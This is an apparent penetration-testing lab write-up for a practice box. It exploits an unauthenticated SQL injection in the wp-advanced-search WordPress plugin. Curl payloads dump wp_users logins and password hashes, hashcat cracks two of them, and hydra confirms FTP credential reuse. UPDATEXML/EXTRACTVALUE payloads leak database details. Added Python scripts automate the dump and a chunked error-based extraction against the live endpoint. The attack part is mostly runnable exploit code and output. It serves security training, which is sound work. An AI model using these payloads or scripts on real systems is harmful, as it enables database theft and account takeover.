SQLi


An SQL injection vulnerability has been identified in the target WordPress instance: it runs an outdated plugin, wp-advanced-search 3.3.8, whose autocompletion endpoint builds a query from unsanitised request parameters and is reachable without any session (CVE-2024-9796).

The PoC provided in the official disclosure of the vulnerability has been confirmed against the target:

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ sqli=$(echo 'f="f--&t=t&e=e&q=q') ; time curl -s "http://workaholic.offsec//wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?$sqli"
Erreur : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"f-- FROM t WHERE "f-- LIKE '%q%' ORDER BY "f-- ASC, idindex DESC' at line 1
real	0.06s
user	0.01s
sys	0.00s
cpu	12%

The error message leaks the query template: SELECT <f> FROM <t> WHERE <f> LIKE '%<q>%' ORDER BY <f> ASC, idindex DESC. After some trial and error, it has been confirmed that

  • the q parameter is fed into the LIKE pattern
  • the f parameter is used in the SELECT list, the WHERE clause and the ORDER BY clause
  • the t parameter is used in the FROM clause

Terminating t with a comment (wp_users--) therefore drops the WHERE and ORDER BY clauses entirely, which is why q can be anything and every row of the table comes back:

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ sqli=$(echo 'q=blahblah&f=user_login&t=wp_users--') ; time curl -s "http://workaholic.offsec//wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?$sqli"
admin
charlie
ted
 
real	0.08s
user	0.01s
sys	0.00s
cpu	11%
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ sqli=$(echo 'q=blahblah&f=user_pass&t=wp_users--') ; time curl -s "http://workaholic.offsec//wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?$sqli"
$P$BDJMoAKLzyLPtatN/WQrbPgHVMmNFn.
$P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p.
$P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/
 
real	0.08s
user	0.00s
sys	0.00s
cpu	11%

Usernames and password hashes exfiltrated from the wp_users table. The two dumps are paired by row position: with the ORDER BY commented out, both queries return the rows in the same table order, so the n-th login belongs to the n-th hash (the pairing for ted is confirmed by the FTP login below).

  • admin:$P$BDJMoAKLzyLPtatN/WQrbPgHVMmNFn.
  • charlie:$P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p.
  • ted:$P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/
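Added example, not code from the original write-up: a small Python script that renders the query template recovered from the error message, so a payload can be previewed before it is sent, and that pulls login and hash together in one row with CONCAT instead of relying on two separate dumps returning rows in the same order. The endpoint URL, table and column names are the ones on this page; the q value "x", the 0x3a separator and the helper names are choices of this example, and the e parameter from the PoC is left out because the error message shows no use of it.

```python
import urllib.parse
import urllib.request

# Vulnerable endpoint from the write-up (no session needed).
URL = ("http://workaholic.offsec//wp-content/plugins/wp-advanced-search/"
       "class.inc/autocompletion/autocompletion-PHP5.5.php")


def render_sql(f: str, t: str, q: str) -> str:
    """Query the plugin builds, reconstructed from the MySQL error message:
    f, t and q are concatenated in verbatim (f and t are not even quoted)."""
    return f"SELECT {f} FROM {t} WHERE {f} LIKE '%{q}%' ORDER BY {f} ASC, idindex DESC"


def effective_sql(sql: str) -> str:
    """What MySQL actually evaluates once a '-- ' comment has been injected."""
    i = sql.find("-- ")
    return sql if i < 0 else sql[:i].rstrip()


def dump_params(columns, table: str) -> dict:
    """Request parameters that return one 'col1:col2:...' line per row.
    CONCAT keeps the columns of a row together, so the login/hash pairing does
    not depend on two dumps walking the table in the same order. 0x3a is ':'
    as a hex literal, which keeps quotes out of the payload."""
    joined = ",0x3a,".join(columns)
    return {"q": "x", "f": f"CONCAT({joined})", "t": f"{table}-- "}


def parse_rows(body: str, ncols: int):
    """Split the plain-text response into one tuple per row; blank lines are skipped."""
    return [tuple(line.split(":", ncols - 1))
            for line in body.splitlines() if line.strip()]


def dump(columns, table):
    """Fire the request against the target and return the parsed rows."""
    qs = urllib.parse.urlencode(dump_params(columns, table))
    with urllib.request.urlopen(f"{URL}?{qs}") as resp:
        return parse_rows(resp.read().decode(errors="replace"), len(columns))


if __name__ == "__main__":
    cols = ["user_login", "user_pass"]
    p = dump_params(cols, "wp_users")
    print(effective_sql(render_sql(p["f"], p["t"], p["q"])))  # preview before sending
    for login, pw_hash in dump(cols, "wp_users"):
        print(f"{login}:{pw_hash}")
```

The preview step is the check worth keeping: feeding the PoC's own parameters into render_sql reproduces the fragment MySQL quoted in its error, which is how you know the template is right before sending anything else.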

Password Cracking


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ hashcat -a 0 -m 400 .\hashes.txt .\rockyou.txt
hashcat (v6.2.6) starting
 
Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
$P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/:okadamat17
$P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p.:chrish20
Approaching final keyspace - workload adjusted.
 
 
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 400 (phpass)
Hash.Target......: .\hashes.txt
Time.Started.....: Fri Jun 27 17:04:30 2025 (37 secs)
Time.Estimated...: Fri Jun 27 17:05:07 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   782.8 kH/s (0.58ms) @ Accel:256 Loops:64 Thr:128 Vec:1
Speed.#3.........:    34393 H/s (6.71ms) @ Accel:16 Loops:128 Thr:64 Vec:1
Speed.#*.........:   817.2 kH/s
Recovered........: 2/3 (66.67%) Digests (total), 2/3 (66.67%) Digests (new), 2/3 (66.67%) Salts
Progress.........: 43033155/43033155 (100.00%)
Rejected.........: 0/43033155 (0.00%)
Restore.Point....: 14259057/14344385 (99.41%)
Restore.Sub.#1...: Salt:2 Amplifier:0-1 Iteration:8128-8192
Restore.Sub.#3...: Salt:2 Amplifier:0-1 Iteration:8064-8192
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[284b29616c616d696572646138284b29] -> $HEX[042a0337c2a156616d6f732103]
Candidates.#3....: 0122665023 -> 008850
Hardware.Mon.#1..: Temp: 66c Util:  0% Core:1222MHz Mem:6000MHz Bus:8
Hardware.Mon.#3..: N/A
 
Started: Fri Jun 27 17:04:00 2025
Stopped: Fri Jun 27 17:05:10 2025

Password hashes cracked for the charlie and ted users; the admin hash survived the rockyou wordlist (status Exhausted, 2/3 recovered):

  • charlie:chrish20
  • ted:okadamat17
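Added example, not code from the original write-up: a pure-Python implementation of the portable phpass scheme behind hashcat mode 400, used here to re-verify the two cracked passwords independently of hashcat. The hashes and passwords are the ones on this page; the function names are choices of this example. The setting character after "$P$" encodes the round count (the "B" on these hashes is 2^13 = 8192 rounds of MD5, which matches the Iteration:…-8192 counters in the hashcat output and explains the modest kH/s).

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass' own base64 variant (not RFC 4648): 3 bytes -> 4 chars, low bits first."""
    out, i = "", 0
    while i < count:
        value = data[i]
        i += 1
        out += ITOA64[value & 0x3F]
        if i < count:
            value |= data[i] << 8
        out += ITOA64[(value >> 6) & 0x3F]
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out += ITOA64[(value >> 12) & 0x3F]
        if i >= count:
            break
        i += 1
        out += ITOA64[(value >> 18) & 0x3F]
    return out


def phpass_rounds(stored: str) -> int:
    """Round count encoded in the 4th character of a $P$/$H$ hash (log2 via ITOA64)."""
    return 1 << ITOA64.index(stored[3])


def phpass_hash(password: str, setting: str) -> str:
    """Recompute a portable phpass hash from its 12-char setting (prefix, rounds, salt)."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a portable phpass hash")
    rounds = phpass_rounds(setting)
    salt = setting[4:12].encode()
    pw = password.encode()
    h = hashlib.md5(salt + pw).digest()
    for _ in range(rounds):               # MD5 chained `rounds` times over digest||password
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h, 16)


def phpass_check(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash against the stored one."""
    return hmac.compare_digest(phpass_hash(password, stored), stored)


# Hashes and cracked passwords taken from the write-up above.
CRACKED = {
    "charlie": ("$P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p.", "chrish20"),
    "ted": ("$P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/", "okadamat17"),
}


def verify_cracked(cracked=CRACKED) -> dict:
    """Confirm each cracked password against its hash, independently of hashcat."""
    return {user: phpass_check(pw, h) for user, (h, pw) in cracked.items()}


if __name__ == "__main__":
    for user, ok in verify_cracked().items():
        print(f"{user}: {'OK' if ok else 'MISMATCH'}")
```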

Credential Reuse


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ hydra -L ./users.txt -P ./passwords.txt -I -t 64 ftp://$IP                                          
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-27 17:09:03
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:3/p:2), ~1 try per task
[DATA] attacking ftp://192.168.136.229:21/
[21][ftp] host: 192.168.136.229   login: ted   password: okadamat17
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-27 17:09:06

The cracked password of the ted user is reused on the target FTP server.

Error-based In-band


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ sqli=$(echo 'f=UPDATEXML(1337,CONCAT(version()),31337)--') ; time curl -s "http://workaholic.offsec//wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?$sqli&q=q"        
Erreur : XPATH syntax error: '.41-0ubuntu0.24.04.1'
real	0.07s
user	0.01s
sys	0.00s
cpu	11%

Using the UPDATEXML method. The leaked string is truncated: MySQL reports the XPath error starting at the first token it cannot parse, so the leading digits of the version string are consumed as a valid XPath number and only '.41-0ubuntu0.24.04.1' is shown. Prefixing the value with a character that is not valid XPath (the 0x11 used below, or the more usual 0x7e '~') avoids this. The error text is also capped at 32 characters, so longer values have to be read in pieces with SUBSTRING.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ sqli=$(echo 'f=EXTRACTVALUE(1337,CONCAT(0x11,database()))--') ; time curl -s "http://workaholic.offsec//wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?$sqli&q=q"      
Erreur : XPATH syntax error: 'wordpress'
real	0.06s
user	0.01s
sys	0.00s
cpu	14%

Using the EXTRACTVALUE method with a 0x11 prefix (a non-printable control character, which is why it does not appear in the output), so the whole value is reported this time. The current database is wordpress.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ sqli=$(echo 'f=EXTRACTVALUE(1337,CONCAT(0x11,current_user()))--') ; time curl -s "http://workaholic.offsec//wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?$sqli&q=q"   
Erreur : XPATH syntax error: 'wpadmin@localhost'
real	0.06s
user	0.01s
sys	0.00s
cpu	13%

Using the EXTRACTVALUE method. current_user() returns the database account rather than a database: the application connects to MySQL as wpadmin@localhost.

It was not possible to progress further from this point.
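The error-based channel shown above yields one value per request and at most 32 characters per error. The following added example (not code from the original write-up) generalises it: it walks a value 31 characters at a time with SUBSTRING behind a 0x7e marker, and enumerates rows with LIMIT n,1, which is what would be needed to pull the wp_users hashes through this channel on a target where the FROM injection did not echo its result set. The URL and the "Erreur : XPATH syntax error" output format are taken from this page; the helper names and the offline stand-in for the server (built from the rows recovered above) are constructed for the example.

```python
import re
import urllib.parse
import urllib.request
from typing import Callable, Optional

URL = ("http://workaholic.offsec//wp-content/plugins/wp-advanced-search/"
       "class.inc/autocompletion/autocompletion-PHP5.5.php")
CHUNK = 31   # MySQL caps the XPATH error text at 32 chars; one is spent on the marker
ERR_RE = re.compile(r"XPATH syntax error: '~(.*)'")


def chunk_payload(expr: str, pos: int) -> str:
    """`f` value leaking characters pos..pos+30 of expr (SUBSTRING is 1-based).
    The 0x7e ('~') marker is not valid XPath, so the error quotes the string from
    its first character instead of swallowing a leading number."""
    return f"EXTRACTVALUE(1337,CONCAT(0x7e,SUBSTRING(({expr}),{pos},{CHUNK})))-- "


def parse_chunk(body: str) -> Optional[str]:
    """Text after the marker, or None when no XPATH error came back (NULL value)."""
    m = ERR_RE.search(body)
    return m.group(1) if m else None


def extract(expr: str, fetch: Callable[[str], str]) -> Optional[str]:
    """Read a scalar of any length, 31 characters per request.
    Returns None when expr yields NULL (e.g. no such row) and '' for an empty value."""
    out, pos = "", 1
    while True:
        chunk = parse_chunk(fetch(chunk_payload(expr, pos)))
        if chunk is None:
            return None if pos == 1 else out
        out += chunk
        if len(chunk) < CHUNK:       # short (or empty) chunk: end of value reached
            return out
        pos += CHUNK


def dump_column(column: str, table: str, fetch: Callable[[str], str], limit: int = 50):
    """Enumerate rows one at a time with LIMIT n,1 until the subquery returns no row."""
    rows = []
    for n in range(limit):
        value = extract(f"SELECT {column} FROM {table} LIMIT {n},1", fetch)
        if value is None:
            break
        rows.append(value)
    return rows


def http_fetch(payload: str) -> str:
    """Send the payload to the target; t and q no longer matter once f ends in a comment."""
    qs = urllib.parse.urlencode({"f": payload, "t": "t", "q": "q"})
    with urllib.request.urlopen(f"{URL}?{qs}") as resp:
        return resp.read().decode(errors="replace")


# Constructed stand-in for the target so the logic runs offline: it answers the
# SUBSTRING/LIMIT payloads built above the way MySQL would, over the wp_users rows
# recovered on this page.
FAKE_DB = {"wp_users": [
    {"user_login": "admin",   "user_pass": "$P$BDJMoAKLzyLPtatN/WQrbPgHVMmNFn."},
    {"user_login": "charlie", "user_pass": "$P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p."},
    {"user_login": "ted",     "user_pass": "$P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/"},
]}
PAYLOAD_RE = re.compile(r"SUBSTRING\(\(SELECT (\w+) FROM (\w+) LIMIT (\d+),1\),(\d+),(\d+)\)")


def fake_fetch(payload: str) -> str:
    m = PAYLOAD_RE.search(payload)
    if not m:
        return "Erreur : You have an error in your SQL syntax"
    col, table = m.group(1), m.group(2)
    n, pos, ln = (int(x) for x in m.group(3, 4, 5))
    rows = FAKE_DB.get(table, [])
    if n >= len(rows):
        return ""                 # SUBSTRING(NULL) -> CONCAT -> NULL: no error is raised
    value = rows[n][col]
    return f"Erreur : XPATH syntax error: '~{value[pos - 1:pos - 1 + ln]}'"


if __name__ == "__main__":
    for login, pw_hash in zip(dump_column("user_login", "wp_users", fake_fetch),
                              dump_column("user_pass", "wp_users", fake_fetch)):
        print(f"{login}:{pw_hash}")   # swap fake_fetch for http_fetch to run it live
```

The stop conditions are the part worth getting right: a chunk shorter than 31 characters (including the empty chunk you get when a value is an exact multiple of 31) ends the value, while the absence of any XPATH error means the expression was NULL, which is how dump_column knows it has run past the last row.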